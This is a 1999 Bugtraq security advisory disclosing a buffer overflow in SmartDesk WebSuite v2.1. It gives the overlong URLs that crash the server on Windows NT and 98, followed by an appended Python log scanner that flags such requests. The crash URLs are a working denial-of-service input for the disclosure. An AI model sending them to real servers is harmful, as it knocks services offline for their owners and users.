From cmart@mail.staticusers.net Mon May 31 06:40:49 1999
From: cmart
To: BUGTRAQ@netspace.org
Date: Tue, 25 May 1999 20:53:17 PDT
Subject: Buffer overflow in SmartDesk WebSuite v2.1

Advisory: Buffer overflow in SmartDesk WebSuite v2.1
Platforms Affected: Windows NT, Windows 98
Found by: cmart (cmart@staticusers.net)
Date: 5/23/99

Description:
-----------
WebSuite v2.1 crashes when 250+ additional characters are appended after the site's URL on NT Server 4 and NT Workstation 4 boxes. Running on top of Windows 98, it crashes with 150+ characters appended after the site's URL.

After reinstalling on both platforms several times, the overflow string length varied. Approximately 1 out of 8 times, the overflow string went from 150 chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about 2000+ chars.

After the server crashes on NT Workstation 4, it is unable to find the lib file sysclass.flb (in our test).

Details:
-------
[Windows NT]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000

SDWEBSRV.EXE crashes.

[Windows 98]
http://hostname/00000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000

SDWEBSRV.EXE crashes.

-----------------------------
cmart | cmart@staticusers.net
http://winntsec.com
-----------------------------
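
A defender-side check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans Common Log Format lines and flags request targets at or above the 150-character lower bound reported above. It assumes the log comes from a proxy or sensor in front of the web server; the function names, threshold constant and sample log lines are constructed for illustration.

```python
import re

# Lowest appended-length the advisory reports as crashing the server
# (150+ on Windows 98, 250+ on NT); used here as the alert threshold.
MIN_SUSPECT_LEN = 150

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)(?: [^"]*)?" (\S+)')

def longest_run(s):
    """Length of the longest run of one repeated character in s."""
    best = run = 0
    prev = None
    for ch in s:
        run = run + 1 if ch == prev else 1
        prev = ch
        best = max(best, run)
    return best

def flag_overlong_requests(lines, threshold=MIN_SUSPECT_LEN):
    """Return (client, length, longest_run, status) for each request whose
    target, not counting the leading '/', is at least `threshold` chars."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF request line; skip rather than guess
        client, _method, target, status = m.groups()
        appended = target.lstrip("/")
        if len(appended) >= threshold:
            hits.append((client, len(appended), longest_run(appended), status))
    return hits

# Constructed sample lines (not from the advisory); 192.0.2.0/24 is
# documentation address space and 502 stands for "backend did not answer".
SAMPLE_LOG = [
    '192.0.2.10 - - [25/May/1999:20:40:01 -0700] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.77 - - [25/May/1999:20:41:12 -0700] "GET /' + "0" * 250 + ' HTTP/1.0" 502 0',
    '192.0.2.10 - - [25/May/1999:20:42:30 -0700] "GET /search?q=websuite HTTP/1.0" 200 512',
    '192.0.2.10 - - [25/May/1999:20:43:02 -0700] "GET /' + "A" * 149 + ' HTTP/1.0" 404 0',
    '192.0.2.78 - - [25/May/1999:20:44:55 -0700] "GET /' + "0" * 150 + ' HTTP/1.0" 502 0',
]

if __name__ == "__main__":
    for client, n, run, status in flag_overlong_requests(SAMPLE_LOG):
        print(f"{client}: {n} chars after '/', longest run {run}, status {status}")
```

Because the advisory reports that the crashing length varied between installs (up to about 1000+ and 2000+ characters), the threshold is a lower bound for alerting, not a safe maximum.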